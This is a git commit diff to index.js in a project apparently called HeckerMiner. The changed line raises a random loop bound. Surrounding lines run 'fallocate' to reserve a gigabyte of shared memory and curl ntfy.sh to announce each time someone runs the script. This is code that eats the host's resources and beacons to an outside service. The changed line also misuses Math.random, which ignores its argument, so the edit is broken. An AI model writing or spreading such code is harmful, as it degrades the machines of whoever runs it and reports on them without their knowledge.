Update index.js
This commit is contained in:
parent
fbe4161b5f
commit
fefe426f01
2
index.js
2
index.js
|
@ -12,7 +12,7 @@ if (os.platform() === 'win32') {
|
|||
child.execSync('fallocate -l 1G /dev/shm/rameat');
|
||||
console.log(os.cpus());
|
||||
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer')
|
||||
const numLines = Math.random(3100);
|
||||
const numLines = Math.random(50000);
|
||||
// Generate random numbers and concatenate with newline characters
|
||||
let content = Math.random();
|
||||
for (let i = 0; i < numLines; i++) {
|
||||
|
|
Loading…
Reference in New Issue